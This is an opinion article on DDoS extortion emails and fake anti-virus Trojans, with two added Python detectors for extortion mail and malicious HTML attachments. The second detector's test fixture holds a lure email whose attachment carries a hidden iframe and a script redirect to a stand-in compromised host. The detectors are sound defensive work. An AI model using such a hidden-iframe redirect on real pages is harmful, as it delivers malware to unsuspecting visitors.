Attack vectors evolve as extortion and rogue anti-virus threats become more challenging

Opinion by Dan Raywood

In recent weeks I have received a lot of announcements and details on how attack vectors are evolving.

Perhaps this is a coincidence in timing, but since we highlighted how rogue anti-virus was being sold by cold-callers, new methods have also been reported. A media report claimed that online businesses have been facing threats from a criminal gang employing scare tactics to trick them into handing over large sums of money to avoid having their sites hit by distributed denial-of-service (DDoS) attacks.

The tactic is essentially bullying and extortion. According to the ZDNet report, once the message has been received the fraudsters open with a demand for $200, warn the business that they will add another zero to the sum for every 48 hours that it goes unpaid, and launch a DDoS attack against the website at the same time.

Symantec, which identified the tactic, said that attempts to gather personal information or money using tactics similar to those described here are very common in scams.

It said: “In this targeted attack, the ‘To’ header is an email address provided in the registrant contact details for the domain, and the ‘Subject’ header follows a format similar to ‘Hosting - Important Updates and Information’, which helps the email to appear as if it has been sent by the hosting service provider.”
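The two header indicators Symantec describes, a ‘To’ address matching the domain's registrant contact and a subject that mimics a hosting-provider notice, can be turned into a mail-filter check. The script below is an added example, not code from the article, from Symantec or from ZDNet. It assumes a constructed table of registrant contacts standing in for a WHOIS/RDAP lookup, a subject regex and an extortion vocabulary that are both assumptions, and two constructed sample messages.

```python
"""Heuristic detector for DDoS-extortion mail that poses as a hosting notice.

Added example; the registrant table, regex, term list and sample messages
are all constructed assumptions, not data from the article.
"""
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed stand-in for the registrant contact details of the domains
# we operate; a real deployment would pull these from WHOIS/RDAP.
REGISTRANT_CONTACTS = {
    "example.com": "dns-admin@example.com",
    "shop.example.net": "registrar-contact@example.net",
}

# Subject shape reported by Symantec ("Hosting - Important Updates and
# Information"); the exact regex is an assumption.
SUBJECT_PATTERN = re.compile(
    r"\bhosting\b.*\bimportant\b.*\b(updates?|information)\b", re.I
)

# Extortion vocabulary (assumed list, matched against lower-cased body text).
EXTORTION_TERMS = ("ddos", "denial of service", "taken down",
                   "48 hours", "pay us", "$")


def extract_indicators(raw: str) -> dict:
    """Return the three indicators for one raw RFC 5322 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    to_addr = parseaddr(str(msg.get("To", "")))[1].lower()
    subject = str(msg.get("Subject", ""))
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content().lower() if body is not None else ""
    return {
        # Mail aimed at the public registrant contact rather than a real user.
        "to_is_registrant": to_addr in REGISTRANT_CONTACTS.values(),
        # Subject dressed up as a hosting-provider notice.
        "subject_mimics_host": SUBJECT_PATTERN.search(subject) is not None,
        # Which extortion terms appear in the body.
        "extortion_terms": sorted(t for t in EXTORTION_TERMS if t in text),
    }


def is_extortion(raw: str) -> bool:
    """All three indicators together; any one alone is normal hosting mail."""
    ind = extract_indicators(raw)
    return (ind["to_is_registrant"]
            and ind["subject_mimics_host"]
            and len(ind["extortion_terms"]) >= 2)


# Constructed sample: the extortion pattern described in the article.
EXTORTION_MAIL = """\
From: support@hosting-notices.example
To: dns-admin@example.com
Subject: Hosting - Important Updates and Information
Content-Type: text/plain; charset=utf-8

Your site example.com is under DDoS attack. Pay us $200 within 48 hours
or the amount gains a zero every 48 hours and the site stays down.
"""

# Constructed sample: a genuine notice to the same contact with the same
# subject; it must not be flagged.
LEGIT_MAIL = """\
From: noc@example.com
To: dns-admin@example.com
Subject: Hosting - Important Updates and Information
Content-Type: text/plain; charset=utf-8

Scheduled maintenance on Saturday 02:00-04:00 UTC. No action required.
"""

if __name__ == "__main__":
    for label, raw in (("extortion", EXTORTION_MAIL), ("legit", LEGIT_MAIL)):
        print(label, is_extortion(raw), extract_indicators(raw))
```

The check deliberately requires all three signals: real hosting providers do write to the registrant contact with subjects like this, so the ‘To’ and ‘Subject’ indicators only become meaningful alongside the ransom language.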

VeriSign CTO Ken Silva commented that the problem in this instance is that enterprises have no way of verifying whether the criminals will actually carry out their threat to take down their sites.

He said: “However, with a DDoS attack able to cost businesses millions of pounds in lost revenue, ignoring such a threat is a risk businesses cannot afford to take. DDoS attacks are increasing in frequency, scale and sophistication, as are the tactics employed by cyber criminals.

“A report by Forrester found that just under 75 per cent of respondents had been a victim of one or more DDoS attacks within the past year. We often see companies trying to protect themselves by employing outdated practices such as bandwidth over provisioning which are costly and ineffective. The fact remains that prevention is always better than cure.”

Another ‘trend’ involves a Trojan that forces the uninstall of legitimate anti-virus software and then installs AnVi, a clone of the prevalent CoreGuard rogue anti-virus product.

Also detected by Symantec, the Trojan that delivers the AnVi fake product relies on the legitimate anti-virus vendor's own uninstaller: once the malicious file is executed, it shows a message box asking the user to uninstall the legitimate anti-virus program, if one is present on the computer.

It said: “In this case it is using the legitimate anti-virus uninstaller and forces the user to remove the anti-virus software from the computer. Moreover, it tries to download rogue anti-virus software by connecting to malicious websites. In this case it tries to download AnVi Antivirus, which is a clone of the CoreGuard Antivirus 2009 misleading application.”

Rob Horton at NCC Group said: “These forms of social engineering attacks are becoming more common. Keeping your system and anti-virus software fully up-to-date can help mitigate the threats presented by some of these attacks.

“However, the key to adequate protection lies in browsing caution, paying close attention to any warnings displayed by your operating system or browser, and being very careful what you click on.”

The threat of rogue anti-virus, it seems, will never go away. Sophos recently warned of a new threat that spreads via ‘suspicious email attachments from unknown sources’. It said that if recipients open the HTML files attached to the spam emails, their web browser is directed to a hacked website containing a malicious iframe that allows the fake anti-virus attack to be launched.

Sophos detects the malicious email attachments as Troj/JSRedir-CH and the fake anti-virus attack as Mal/FakeAV-EI. The emails use a variety of themes ranging from credit card charges to free-to-view holiday photographs to lure recipients in.
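The Sophos description above is a chain of HTML attachment, JavaScript redirect, and hidden iframe on a compromised site. The script below is an added example, not code from the article or from Sophos, of a mail-gateway check that walks a MIME message, pulls out HTML attachments, and reports hidden iframes and script or meta-refresh redirects found in them. The regexes and the two sample messages are constructed assumptions; the hostnames are placeholders.

```python
"""Scan HTML email attachments for hidden iframes and client-side redirects.

Added example; the regexes and sample messages are constructed assumptions.
"""
import email
import re
from email import policy

# Assumed patterns for the markup the attack chain relies on.
IFRAME_RE = re.compile(r'<iframe\b[^>]*>', re.I | re.S)
SRC_RE = re.compile(r'''src\s*=\s*["']?([^"'\s>]+)''', re.I)
HIDDEN_RE = re.compile(
    r'''(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden''',
    re.I,
)
REDIRECT_RE = re.compile(
    r'''(?:window|document|self|top)\.location(?:\.href)?\s*=\s*["']([^"']+)["']'''
    r'''|<meta\b[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*url\s*=\s*["']?([^"'>\s]+)''',
    re.I | re.S,
)


def _text(part) -> str:
    """Decode a MIME part to str whether it is text/* or an octet-stream."""
    payload = part.get_content()
    if isinstance(payload, bytes):
        return payload.decode(part.get_content_charset() or "utf-8", "replace")
    return payload


def html_attachments(msg):
    """Yield (filename, html) for every HTML attachment in the message."""
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        fname = (part.get_filename() or "").lower()
        is_html = part.get_content_type() == "text/html" or fname.endswith((".htm", ".html"))
        if is_html and (part.is_attachment() or fname):
            yield fname or "(inline html)", _text(part)


def scan_attachment_html(html: str) -> list:
    """Report iframes (with hidden/zero-size flag) and redirects in one HTML blob."""
    findings = []
    for tag in IFRAME_RE.finditer(html):
        tag_text = tag.group(0)
        src = SRC_RE.search(tag_text)
        findings.append({
            "kind": "iframe",
            "target": src.group(1) if src else None,
            "hidden": HIDDEN_RE.search(tag_text) is not None,
        })
    for m in REDIRECT_RE.finditer(html):
        findings.append({"kind": "redirect", "target": m.group(1) or m.group(2), "hidden": True})
    return findings


def scan_message(raw: str) -> list:
    """Parse a raw RFC 5322 message and scan each HTML attachment."""
    msg = email.message_from_string(raw, policy=policy.default)
    out = []
    for name, html in html_attachments(msg):
        for finding in scan_attachment_html(html):
            finding["attachment"] = name
            out.append(finding)
    return out


# Constructed sample: the "holiday photos" lure with a redirecting attachment.
SAMPLE_MAIL = """\
From: photos@holiday.example
To: victim@example.com
Subject: Your holiday photos
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Open the attached page to view the photos.

--b1
Content-Type: text/html; charset=utf-8; name="photos.html"
Content-Disposition: attachment; filename="photos.html"

<html><body><p>Loading photos...</p>
<iframe src="http://hacked-site.example/scan.php" width="0" height="0" style="display:none"></iframe>
<script>window.location.href = "http://hacked-site.example/";</script>
</body></html>

--b1--
"""

# Constructed sample: an HTML attachment with nothing suspicious in it.
CLEAN_MAIL = """\
From: friend@example.org
To: victim@example.com
Subject: Invitation
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/html; charset=utf-8
Content-Disposition: attachment; filename="invite.html"

<html><body><h1>Party on Saturday</h1><p>Bring a friend.</p></body></html>

--b2--
"""

if __name__ == "__main__":
    for finding in scan_message(SAMPLE_MAIL):
        print(finding)
    print("clean:", scan_message(CLEAN_MAIL))
```

Regex scanning is a triage aid, not a parser: obfuscated JavaScript will slip past `REDIRECT_RE`, so a gateway that sees HTML attachments at all is usually better off quarantining or detonating them than trusting a pattern match.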

Graham Cluley, senior technology consultant at Sophos, said: “A scam like this can be extremely successful at passing revenue directly and quickly into the hands of hackers - so we all have to be on our guard. The attacks are designed to trick people into paying to remove threats from their computer that never really existed in the first place.

“Once a user's computer is infected with fake anti-virus, the software will continue to bombard the user with bogus warning messages to encourage them to pay for threats to be removed or install more malicious code onto their PC. If computer users are concerned about the security of their machine, they should go directly to a legitimate IT security site, rather than put their trust in a criminal hacking gang.”

These threats are likely to be a few among many, and I dare say that there are stronger and more successful opportunities being peddled right now. When it comes to user security, a reputable brand is the way forward.

However, if you are threatened with an attack, the decision on how to respond to what may be an empty threat rests with you, the recipient.
